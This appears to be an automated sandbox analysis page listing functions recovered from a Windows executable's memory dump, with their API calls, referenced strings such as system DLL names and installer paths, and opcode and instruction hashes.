Instruction ID: d55832709310486359acfe646cff7b73bda5efb8bd5afd614d3188ca878e082f
Opcode Fuzzy Hash: e2f07e41a968fcb04ee9550a9d49684c74127b96f7d0acdc7beaa72636b89f1c
Instruction Fuzzy Hash: 60129C61E18BC281EB109F64E8952B963B1FF85786F404236DBDDC6AA6EF3CE151C344

Function 00007FF6CCC9A4AC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 250COMMON

Download Yara Rule

APIs

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CCC9A504

Part of subcall function 00007FF6CCCA0F68: WideCharToMultiByte.KERNEL32 ref: 00007FF6CCCA0F99

SetDlgItemTextW.USER32 ref: 00007FF6CCC9A573
GetWindowRect.USER32 ref: 00007FF6CCC9A5AD
GetClientRect.USER32 ref: 00007FF6CCC9A5BB
GetWindowLongPtrW.USER32 ref: 00007FF6CCC9A66C
GetWindowRect.USER32 ref: 00007FF6CCC9A6B2
SetDlgItemTextW.USER32 ref: 00007FF6CCC9A6EC
GetSystemMetrics.USER32 ref: 00007FF6CCC9A6F7
GetWindow.USER32 ref: 00007FF6CCC9A708
GetWindowRect.USER32 ref: 00007FF6CCC9A746
GetWindow.USER32 ref: 00007FF6CCC9A808

Strings

CAPTION, xrefs: 00007FF6CCC9A6CF
$%s:, xrefs: 00007FF6CCC9A4EF

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
String ID: $%s:$CAPTION
API String ID: 1936833115-404845831
Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction ID: 57866afebe06e2fc0b07715e41805af1776280f9e56ed170e3603fe13a9b95b5
Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
Instruction Fuzzy Hash: BC91D532B1868287E718DF29A80166AB7B1FB85785F445539EF8D97B58CF3CE805CB40

Function 00007FF6CCCA8624 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101memorywindowCOMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32 ref: 00007FF6CCCA863D
SizeofResource.KERNEL32 ref: 00007FF6CCCA8659
LoadResource.KERNEL32 ref: 00007FF6CCCA8673
LockResource.KERNEL32 ref: 00007FF6CCCA8685
GlobalAlloc.KERNEL32 ref: 00007FF6CCCA86A6
GlobalLock.KERNEL32 ref: 00007FF6CCCA86BB
GdipAlloc.GDIPLUS ref: 00007FF6CCCA86FE
GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF6CCCA8769
GlobalUnlock.KERNEL32 ref: 00007FF6CCCA878C
GlobalFree.KERNEL32 ref: 00007FF6CCCA8795

Strings

PNG, xrefs: 00007FF6CCCA862F

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
String ID: PNG
API String ID: 541704414-364855578
Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction ID: 22dd678730c3d3b30c11685b3c87e1482fcda545a0317447775ca951f2dc171d
Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
Instruction Fuzzy Hash: 88411E25A19A8682EF049F56D498379A3B0AF88B96F044435DF8DC73A5EF7CE4498740

Function 00007FF6CCC8F930 Relevance: 17.2, APIs: 8, Strings: 1, Instructions: 1417COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC91239
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9123F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC91245
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9124B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC91251
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC91257
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9125D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC91263

Strings

__tmp_reference_source_, xrefs: 00007FF6CCC8FCCF, 00007FF6CCC8FCDE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: __tmp_reference_source_
API String ID: 3668304517-685763994
Opcode ID: 83a3fe73595bb06b40dfbb6262369fdb56ff97fa1345120322522a6d2691f441
Instruction ID: 22d843bb5fc1c402885a04975c53fe7d72c2617cae534defe939cc7d806b3ed9
Opcode Fuzzy Hash: 83a3fe73595bb06b40dfbb6262369fdb56ff97fa1345120322522a6d2691f441
Instruction Fuzzy Hash: F4E29D62A08AC292EB64CF65E1403BEA7B1FB85799F404136DBDD83AA5CF3DE455C700

Function 00007FF6CCC84840 Relevance: 12.1, APIs: 5, Strings: 1, Instructions: 1624COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8511E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC85124
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8512A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC85E16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC85E1C

Strings

CMT, xrefs: 00007FF6CCC859B2

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: CMT
API String ID: 3668304517-2756464174
Opcode ID: de8abfa7229b1edd29109abd571571e97c9e15b363706f80c43edb19f81fb34c
Instruction ID: 43f9e097fe8c00ed6560115c0afee66eb2340562d8e47d53a7ca14d0adef0796
Opcode Fuzzy Hash: de8abfa7229b1edd29109abd571571e97c9e15b363706f80c43edb19f81fb34c
Instruction Fuzzy Hash: D6E2DB22B086C286FB18DF65D5A06FE67B1BB4478AF400136DB9E87A96DF7CE455C300

Function 00007FF6CCC940BC Relevance: 10.7, APIs: 7, Instructions: 153fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE ref: 00007FF6CCC9410B
FindFirstFileW.KERNEL32 ref: 00007FF6CCC9415E
GetLastError.KERNEL32 ref: 00007FF6CCC941AF
FindNextFileW.KERNEL32 ref: 00007FF6CCC941D7
GetLastError.KERNEL32 ref: 00007FF6CCC941E5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9430F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC94315

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
String ID:
API String ID: 474548282-0
Opcode ID: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
Instruction ID: c2a4cbde1cc04e1596e9066e39870ccd0c52831737b8ca53ad45e0f723cec98b
Opcode Fuzzy Hash: ee5b8a3817742aa34bf8fe6f457784b4fe5053db0f5ec5b81f22969634733f46
Instruction Fuzzy Hash: 0C618362A08A8681EA10DF24E88427E6371FB957B9F505331EBED83AD9DF3CD555C700

Function 00007FF6CCC85E24 Relevance: 7.6, APIs: 3, Strings: 1, Instructions: 586COMMON

Download Yara Rule

Strings

CMT, xrefs: 00007FF6CCC859B2, 00007FF6CCC8675B

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID:
String ID: CMT
API String ID: 0-2756464174
Opcode ID: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
Instruction ID: b26370b8b8a9becaf68db95ea06c46e35eb7f0a0f38d7bb9b9e1a4d5abfa4f4f
Opcode Fuzzy Hash: e58ea5d07e30f29eaf86f68642e1cb38961aa44a7661b56cd2ad864dc5164ece
Instruction Fuzzy Hash: 5E42B822B086C29AEB18DF74D1916FE67B1EB51389F400136DB9E936D6DF38E569C300

Function 00007FF6CCC9DFD0 Relevance: 143.9, APIs: 16, Strings: 66, Instructions: 440libraryfileloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E018
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E030
GetProcAddress.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E05D
CreateFileW.KERNEL32 ref: 00007FF6CCC9E3F0
SetFilePointer.KERNEL32 ref: 00007FF6CCC9E40E
ReadFile.KERNEL32 ref: 00007FF6CCC9E436

Part of subcall function 00007FF6CCC9DFD0: GetSystemDirectoryW.KERNEL32 ref: 00007FF6CCC9DDDF

CompareStringW.KERNELBASE ref: 00007FF6CCC9E559
CloseHandle.KERNEL32 ref: 00007FF6CCC9E4F3

Part of subcall function 00007FF6CCC81FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC81FFB

Part of subcall function 00007FF6CCC951A4: GetVersionExW.KERNEL32 ref: 00007FF6CCC951D5

Part of subcall function 00007FF6CCC9DFD0: LoadLibraryW.KERNELBASE ref: 00007FF6CCC9DEFF
Part of subcall function 00007FF6CCC9DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9DFB5
Part of subcall function 00007FF6CCC9DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9DFBB
Part of subcall function 00007FF6CCC9DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9DFC1
Part of subcall function 00007FF6CCC9DFD0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9DFC7

AllocConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E74B
GetCurrentProcessId.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E755
AttachConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E75D
GetStdHandle.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E780
WriteConsoleW.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E799
Sleep.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E7A4
FreeConsole.KERNEL32(?,?,?,00000000,?), ref: 00007FF6CCC9E7AA
ExitProcess.KERNEL32 ref: 00007FF6CCC9E7BB

Strings

ntshrui.dll, xrefs: 00007FF6CCC9E12B
ws2_32.dll, xrefs: 00007FF6CCC9E0FF
dfscli.dll, xrefs: 00007FF6CCC9E2F3
ieframe.dll, xrefs: 00007FF6CCC9E120
dwmapi.dll, xrefs: 00007FF6CCC9E0BD, 00007FF6CCC9E661
dsrole.dll, xrefs: 00007FF6CCC9E37F
XmlLite.dll, xrefs: 00007FF6CCC9E339
sfc_os.dll, xrefs: 00007FF6CCC9E091
apphelp.dll, xrefs: 00007FF6CCC9E14F
rsaenh.dll, xrefs: 00007FF6CCC9E0A7
aclui.dll, xrefs: 00007FF6CCC9E371
SetDllDirectoryW, xrefs: 00007FF6CCC9E026
comres.dll, xrefs: 00007FF6CCC9E0F4
atl.dll, xrefs: 00007FF6CCC9E136
uxtheme.dll, xrefs: 00007FF6CCC9E66D
userenv.dll, xrefs: 00007FF6CCC9E15D
clbcatq.dll, xrefs: 00007FF6CCC9E0E9
oleaccrc.dll, xrefs: 00007FF6CCC9E1E9
mpr.dll, xrefs: 00007FF6CCC9E291
psapi.dll, xrefs: 00007FF6CCC9E115
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF6CCC9E73B
cabinet.dll, xrefs: 00007FF6CCC9E1DB
samlib.dll, xrefs: 00007FF6CCC9E2D7
wkscli.dll, xrefs: 00007FF6CCC9E2E5
ntmarta.dll, xrefs: 00007FF6CCC9E1F7
ws2help.dll, xrefs: 00007FF6CCC9E10A
cryptsp.dll, xrefs: 00007FF6CCC9E355
propsys.dll, xrefs: 00007FF6CCC9E2AD
iphlpapi.DLL, xrefs: 00007FF6CCC9E267
WINNSI.DLL, xrefs: 00007FF6CCC9E275
samcli.dll, xrefs: 00007FF6CCC9E2C9
dnsapi.DLL, xrefs: 00007FF6CCC9E259
slc.dll, xrefs: 00007FF6CCC9E23D
linkinfo.dll, xrefs: 00007FF6CCC9E347
browcli.dll, xrefs: 00007FF6CCC9E301
WindowsCodecs.dll, xrefs: 00007FF6CCC9E213
crypt32.dll, xrefs: 00007FF6CCC9E187
peerdist.dll, xrefs: 00007FF6CCC9E38D
DXGIDebug.dll, xrefs: 00007FF6CCC9E086, 00007FF6CCC9E5B6
dhcpcsvc.dll, xrefs: 00007FF6CCC9E32B
rasadhlp.dll, xrefs: 00007FF6CCC9E30F
setupapi.dll, xrefs: 00007FF6CCC9E141
cryptui.dll, xrefs: 00007FF6CCC9E1A3
mlang.dll, xrefs: 00007FF6CCC9E2BB
SSPICLI.DLL, xrefs: 00007FF6CCC9E09C
dhcpcsvc6.dll, xrefs: 00007FF6CCC9E31D
RpcRtRemote.dll, xrefs: 00007FF6CCC9E363
secur32.dll, xrefs: 00007FF6CCC9E1CD
imageres.dll, xrefs: 00007FF6CCC9E24B
profapi.dll, xrefs: 00007FF6CCC9E205
kernel32, xrefs: 00007FF6CCC9E011
msasn1.dll, xrefs: 00007FF6CCC9E195
wintrust.dll, xrefs: 00007FF6CCC9E1B1
shell32.dll, xrefs: 00007FF6CCC9E1BF
netutils.dll, xrefs: 00007FF6CCC9E283
devrtl.dll, xrefs: 00007FF6CCC9E29F
UXTheme.dll, xrefs: 00007FF6CCC9E0B2
version.dll, xrefs: 00007FF6CCC9E07B
cscapi.dll, xrefs: 00007FF6CCC9E22F
srvcli.dll, xrefs: 00007FF6CCC9E221
cryptbase.dll, xrefs: 00007FF6CCC9E0C8
lpk.dll, xrefs: 00007FF6CCC9E0D3
shdocvw.dll, xrefs: 00007FF6CCC9E179
SetDefaultDllDirectories, xrefs: 00007FF6CCC9E053
netapi32.dll, xrefs: 00007FF6CCC9E16B
usp10.dll, xrefs: 00007FF6CCC9E0DE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 1496594111-2013832382
Opcode ID: f7f2a11762ce96c0b678dc2ee5f4093b28e28463b6618f01c06ebafbf4af03a3
Instruction ID: 6ee8708fbefce6cddaaf5b6ace4f97fdb1711eaaf59568cc1441d99a36204e9a
Opcode Fuzzy Hash: f7f2a11762ce96c0b678dc2ee5f4093b28e28463b6618f01c06ebafbf4af03a3
Instruction Fuzzy Hash: 7132E831A09BC299EB11AF64E8801E973B4FF4435AF501236DB8E96BA5EF3CD655C340

Function 00007FF6CCC998DC Relevance: 25.2, APIs: 3, Strings: 11, Instructions: 702COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC98E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6CCC98F8D

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6CCC99F75
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9A42F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC9A435

Part of subcall function 00007FF6CCCA0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6CCCA0B44), ref: 00007FF6CCCA0BE9

Strings

,, xrefs: 00007FF6CCC99FAA
STRINGS, xrefs: 00007FF6CCC99DC1
*messages***, xrefs: 00007FF6CCC99BC6
@%s:, xrefs: 00007FF6CCC99F57
RTL, xrefs: 00007FF6CCC99F2E
, xrefs: 00007FF6CCC99DF9
DIALOG, xrefs: 00007FF6CCC99DCD
MENU, xrefs: 00007FF6CCC99DD9
$%s:, xrefs: 00007FF6CCC99F50
DIRECTION, xrefs: 00007FF6CCC99DE5
*messages***, xrefs: 00007FF6CCC99C04

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: fbb6bb3726090cda1910aaae614b465107cbfe89c1b50f7df837cda548b3fcd6
Instruction ID: a28d3f32dbbaa7dd36747dbd03266cf5a5a39cfa6cbb7075298d6d0004573fd9
Opcode Fuzzy Hash: fbb6bb3726090cda1910aaae614b465107cbfe89c1b50f7df837cda548b3fcd6
Instruction Fuzzy Hash: CB62CE22A19AC295EB20EF64D4582BD73B1FB44789F805132DB8E876D5EF3DE985C340

Function 00007FF6CCCB1900 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 195libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCCB1558: DloadProtectSection.DELAYIMP ref: 00007FF6CCCB15C9

RaiseException.KERNEL32 ref: 00007FF6CCCB19A7
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF6CCCB1993

Part of subcall function 00007FF6CCCB1868: DloadProtectSection.DELAYIMP ref: 00007FF6CCCB18C7

LoadLibraryExA.KERNELBASE ref: 00007FF6CCCB1A46
GetLastError.KERNEL32 ref: 00007FF6CCCB1A54
DloadReleaseSectionWriteAccess.DELAYIMP ref: 00007FF6CCCB1A86
RaiseException.KERNEL32 ref: 00007FF6CCCB1A9A

Strings

H, xrefs: 00007FF6CCCB1974

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
String ID: H
API String ID: 3432403771-2852464175
Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction ID: 0ae31571e4a62341814f9a5eb1fd9e6fec28c6dabf4f1d3489af8696154c7d78
Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
Instruction Fuzzy Hash: 66915872B15BA28AEB00DFA5D8906A833B5FB08B9AF054435DF8D97B54EF38E445C300

Function 00007FF6CCCAF4E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 285windowCOMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32 ref: 00007FF6CCCAF747
IsWindowVisible.USER32 ref: 00007FF6CCCAF777
ShowWindow.USER32 ref: 00007FF6CCCAF786
WaitForInputIdle.USER32 ref: 00007FF6CCCAF797
GetExitCodeProcess.KERNEL32 ref: 00007FF6CCCAF7BD
CloseHandle.KERNEL32 ref: 00007FF6CCCAF7E7
ShowWindow.USER32 ref: 00007FF6CCCAF83F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAF8FB

Strings

p, xrefs: 00007FF6CCCAF529
.inf, xrefs: 00007FF6CCCAF675
Install, xrefs: 00007FF6CCCAF684
.exe, xrefs: 00007FF6CCCAF7F2

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 148627002-3607691742
Opcode ID: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
Instruction ID: 83d57c0e7bd7e31ddcf0e416d2d0348795b5a91175f1dc2e2c8766457898a017
Opcode Fuzzy Hash: 6e56b012281178d840e256ad45ed2bf74d7a60ef72c69255f0e18c76dd578e91
Instruction Fuzzy Hash: 62C18D22F08A8295FB14CF65D9582BD23B1AFC5B86F044035DB8DC7AA5DF3CE5A58350

Function 00007FF6CCCAF0A4 Relevance: 16.6, APIs: 11, Instructions: 102COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCCAAE1C: PeekMessageW.USER32 ref: 00007FF6CCCAAE32
Part of subcall function 00007FF6CCCAAE1C: GetMessageW.USER32 ref: 00007FF6CCCAAE49
Part of subcall function 00007FF6CCCAAE1C: IsDialogMessageW.USER32 ref: 00007FF6CCCAAE60
Part of subcall function 00007FF6CCCAAE1C: TranslateMessage.USER32 ref: 00007FF6CCCAAE6F
Part of subcall function 00007FF6CCCAAE1C: DispatchMessageW.USER32 ref: 00007FF6CCCAAE7A

GetDlgItem.USER32 ref: 00007FF6CCCAF0E3
ShowWindow.USER32 ref: 00007FF6CCCAF109
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF11E
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF136
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF157
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF173
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF1B6
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF1D4
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF1E8
IsDlgButtonChecked.USER32 ref: 00007FF6CCCAF212
